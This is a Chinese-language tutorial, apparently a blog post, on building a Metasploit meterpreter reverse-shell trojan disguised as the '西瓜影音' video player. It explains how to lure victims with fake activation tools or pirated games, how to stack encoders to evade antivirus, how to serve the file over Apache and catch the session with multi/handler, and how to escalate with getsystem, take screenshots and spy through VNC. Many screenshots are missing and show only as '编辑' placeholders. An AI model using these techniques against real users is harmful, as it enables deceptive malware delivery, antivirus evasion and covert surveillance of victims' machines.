目录
1.客户端渗透原理
在我们无法突破对方的网络边界的时候,往往需要使用客户端渗透这种方式对目标发起攻击。
客户端渗透技巧,我们可以将软件伪装一下,比如说将名字改为:windows激活工具,盗版游戏,抢红包软件,西瓜影音等等,只要能够吸引目标去下载安装就可以。
平时我们去激活系统,下载的激活工具,即使它提示我们有病毒,但是我们还是会去下载,用的就是这个原理。
2.实验环境
一台kali,一台win7,两台主机是在一个局域网内。
3.实战:使用msfvenom生成西瓜影音看片神器后门木马
msfvenon是msfpayload,msfencode的结合体,可利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线。
1.生成西瓜影音.exe后门程序
使用一个编码器
编辑编辑
使用两个编码器
编辑
编辑
参数说明:
-a 指定架构如 x86 x64。x86代表32位,x64代表64位。32位软件可以在64位系统上运行。
--platform 指定平台,这里选择windows,通过 --| platform 可以查看所有支持的平台
-p 设置攻击载荷,我们使用windows/meterpreter/reverse_tcp,可以通过-| payloads查看所有攻击载荷
LHOST 目标主机执行程序后链接我们的kali地址
LPORT 目标主句执行程序后链接我们kali的端口
-b 去掉坏字符,坏字符会影响payload正常执行。
编辑
编辑
2.kali系统开启apache服务
systemctl start apache2
编辑
3.在win7系统里下载刚刚生成的西瓜影音软件
http://xxx.xxx.xxx.xxx/西瓜影音1.exe
http://xxx.xxx.xxx.xxx/西瓜影音2.exe
编辑
4.我们可以通过下面这个网站来扫描一下我们生成的两个exe病毒检测结果。
编辑
扫描结果:
一个生成器
编辑
两个生成器
编辑
如图,可以看出,两个生成器被检测出病毒的概率小一点。一般,为了不让电脑把软件当成病毒给杀掉,最好使用两个生成器。
2.在MSF上启动handler开始监听后门程序
1.kali启动Metasploit软件
2.使用模块 use exploit/multi/handler,并查看需要配置的参数show options
编辑
3.建立payload
set payload windows/meterpreter/reverse_tcp
编辑
4.设置监听主机--kali
set LHOSTS 192.168.1.53
编辑
5.开启run
编辑
6.在win7电脑里运行刚刚下载的西瓜影音软件。kali系统就建立了会话。
编辑
3.展示一下强大的功能
1.查看权限并提权
编辑
我们可以看到,此时是Administrator权限。一般电脑的权限分为:普通用户权限,管理员权限和系统权限。
输入help可以查看到有很多功能。其中一个就是getsystem。
编辑
输入getsystem,输入getuid,权限就变成了系统权限。
编辑
2.查看文件列表
编辑
3.查看系统信息
sysinfo
编辑
4.截图
(当前win7桌面)screenshot
编辑
存放在root目录下
编辑
5.实时监控win7电脑(惊喜)
run vnc
编辑
编辑
6.其他一些操作
shutdown 关机 reboot 重启 reg注册表相关信息